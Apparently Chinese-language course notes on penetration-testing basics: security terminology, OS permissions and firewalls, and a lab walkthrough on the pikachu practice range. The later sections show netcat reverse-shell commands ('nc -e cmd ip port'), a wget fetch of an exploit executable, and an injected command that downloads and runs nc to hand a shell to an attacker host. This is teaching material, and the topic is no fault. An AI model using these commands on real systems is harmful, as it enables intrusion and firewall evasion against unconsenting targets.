一、名词概念(新补充)

目录

1.前后端

2.POC/EXP

3.payload/shellcode

4.后门/webshell

5.木马/病毒

6.反弹

7.回显

8.跳板

9.黑白盒测试

10.暴力破解

11.社会工程学

12.撞库

13.ATT&CK(红蓝对抗框架)

二.操作系统----用途&命令&权限&用户&防火墙

1.windows/Linux常见命令

2.权限(用户~/文件~/服务~)

3.用户

4.防火墙--自带防火墙入站&出战-规则-策略-协议

*案例一.文件上传下载-->解决无图形化&解决数据传输

1.linux:wget curl python ruby perl java 等

2.widows:PowerShell Certutil Bitsadmin msiexec mshta rundl132 等

案例二.反弹shell命令-->解决数据回显&解决数据通讯

1.回显

补充:内网-外网

结合案例一.防火墙绕过-正向连接&反向连接&内网服务器

实战:(pikachu靶场)(利用工具nc(netcat))


详细网页:https://www.cnblogs.com/sunny11/p/13583083.html

1.前后端

前端为客户端,客户(用户)可以看到的内容。

后端为服务端,有一些程序处理客户端的需求并返回。前端发起请求,需要指定后端的ip端口和地址,才可以找到对应的程序进行处理。

一、名词概念(新补充)_第1张图片

2.POC/EXP

POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。(代码是否存在)

EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。(每个漏洞都有其自己的EXP)

3.payload/shellcode

Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。

Shellcode:

简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。

一段可被操作系统无需特别定位处理的指令,通常在利用软件漏洞后执行的恶意代码,shellcode为二进制的机器码,因为经常让攻击者获得shell而得名。

4.后门/webshell

后门(统称):

这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置,用于访问、查看或者控制这台主机。

这些改动表面上是很难被察觉的,就好象是入侵者偷偷的配了一把主人房间的钥匙,或者在不起眼处修了一条按到,可以方便自身随意进出。

通常大多数木马程序都可以被入侵者用于创建后门(BackDoor)。

Webshell:

就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做是一种网页后门,可以上传下载文件,查看数据库,执行任意程序命令等。

5.木马/病毒

木马:多用来控制电脑,获取数据等。

病毒:具有破坏性

6.反弹

有人发现,防火墙对于连入的连接往往会进行非常严格的过滤,但是对于连出的连接却疏于防范。 于是,利用这一特性,反弹端口型软件的服务端(被控制端)会主动连接客户端(控制端),就给人“被控制端主动连接控制端的假象,让人麻痹大意。

(权限问题,用其他地方去控制)

7.回显

(我输入命令后能看见,有返回的数据)

8.跳板

一个具有辅助作用的机器,利用这个主机作为一个间接工具,来入侵其他主机,一般和肉鸡连用。

A->C B->C

A->B->C

9.黑白盒测试

黑:不知道代码,只有目标。

白:知道源代码等数据。

10.暴力破解

简称“爆破”。黑客对系统中账号的每一个可能的密码进行高度密集的自动搜索,从而破坏安全并获得对计算机的访问权限。

11.社会工程学

人性的弱点,常与apt攻击连用。

12.撞库

撞库是黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,尝试批量登陆其他网站后,得到一系列可以登录的用户。 很多用户在不同网站使用的是相同的帐号密码,因此黑客可以通过获取用户在A网站的账户从而尝试登录B网址,这就可以理解为撞库攻击。

13.ATT&CK(红蓝对抗框架)

MITRE ATT&CK®

可参照概念等~专业

二.操作系统----用途&命令&权限&用户&防火墙

例子:(不绝对)

windows10-->个人计算机

windows2019-->服务器用机

1.windows/Linux常见命令

【3】web安全入门篇-渗透测试中常用的命令_web安全入门篇 渗透测试中常用的命令-CSDN博客

2.权限(用户~/文件~/服务~)

文件~(右键-属性-安全-进行权限设置)

3.用户

用户/组(此电脑-右键-管理查看)

例子:windows:

可通过whoami查看当前身份。-->我为:小灰邪\26255。

system(系统权限)系统自带的,不能被修改删除,不然电脑会出问题。

administrators(管理员权限)

user(创建新用户(普通))

4.防火墙--自带防火墙入站&出战-规则-策略-协议

windows-->windows defence

linux--->iptables

第三方的防火墙--->web防火墙等等

1.入站(严格)&出站(宽松):出去容易,进来难!

2.协议:一种限制,组织。---要走什么协议出入站。(防火墙-高级设置)

*案例一.文件上传下载-->解决无图形化&解决数据传输

啊啊啊!!! 自己搭建网站下载地址或ftp服务器--下载地址!!!!!!!!!!

文件操作快捷命令生成:[~]#棱角 ::Edge.Forum*

###代替访问,直接在小黑窗口输入命令进行下载文件等操作

1.linux:wget curl python ruby perl java 等

》碰到linux服务器,用以上命令进行操作,上传文件。

-o 新名

ls

weget http://xxxxxx/xxx/exploit.exe(网站上传的一个软件下载地址) 域名!!!www.xiaodi8.com!!!!!

2.widows:PowerShell Certutil Bitsadmin msiexec mshta rundl132 等

dir

cd 目录

cd\

案例二.反弹shell命令-->解决数据回显&解决数据通讯

解决交互式问题。

--------------------判断命令成败------------------------------------执行命令后,有没有返回东西--------------------------------------------------

1.回显

linux增添用户/修改密码:

#passwd 用户名

windows:

一、名词概念(新补充)_第2张图片一、名词概念(新补充)_第3张图片

补充:内网-外网

一、名词概念(新补充)_第4张图片

举例:(利用nc工具)

内网:学校,公司,家庭。虚拟机

外网:阿里云。

外网找C的ip地址,C的ip地址到处都有。

外网!-->C

c-->外网 --可以控制阿里云,发送数据过去,要有数据回显,(除建立管道)

内网到处都有。

nc -e cmd ip地址 端口 --将cmd权限移交到外网上。 ip地址为网站的ip,ping一下。

ping 域名 --可以得到网站的ip地址。

nc -lvvp 端口

---浏览器搜的ip为网络出口地址(外网)

---ipconfig的ip地址为内网地址,到处都有

----都不行,怎么办?

让阿里云服务器找到内网出口,建一个策略,然后访问内网下的C。(下节课讲)

结合案例一.防火墙绕过-正向连接&反向连接&内网服务器

1、内网:

18内网 -> xiaodi8

79xiaodi8 !-> 内网

2、防火墙:

xiaodi8 <-> aliyun

xiaodi8防火墙 -> aliyun

aliyun !-> xiaodi8防火墙

防火墙:入站(严格)&出站(宽松)

目标是谁?谁找谁?谁为参照物?

1.正向连接

2.反向连接

发送:nc -e cmd ip port

进行监听:nc -lvvp port

(准备2台外网主机)

用nc

一个监听,一个反弹。反弹命令生成:[~]#棱角 ::Edge.Forum*

防火墙开,就不行了,反弹不了了。那怎么办???!!!!

---正反向问题!

例子: windows开防火墙 linux连接

入站严格啊。

windows:nc -e cmd ip port -->这就是出站,没问题啊。主动把数据交出去。

linux就监听到了。

(正反向看以谁为基准,不是绝对的。)

一般以自己的攻击主机为基准,我要攻击一台服务器,让服务器连我,这就是反向连接!!!

靶场漏洞很多,在线靶机/下载的

实战:(pikachu靶场)(利用工具nc(netcat))

netcat 1.11 for Win32/Win64

fofa:黑暗引擎。搜集目标信息的。

目标:拿下pikachu服务器

1.判断目标为什么系统---信息搜集

可以命令试一下ipconfig/ifconfig

2.给目标下载nc工具---文件上传

一、名词概念(新补充)_第5张图片

ok,我们这里成功下载nc

3.然后 目标机执行:

。。。& n.exe -e cmd ip port

自己监听:nc -lvvp port

一、名词概念(新补充)_第6张图片

ok,成功拿下。

总结:攻击pakachu服务器,通过反向连接,成功拿到pikachu服务器

你可能感兴趣的:(网络安全,安全,网络安全,开发语言,后端,前端)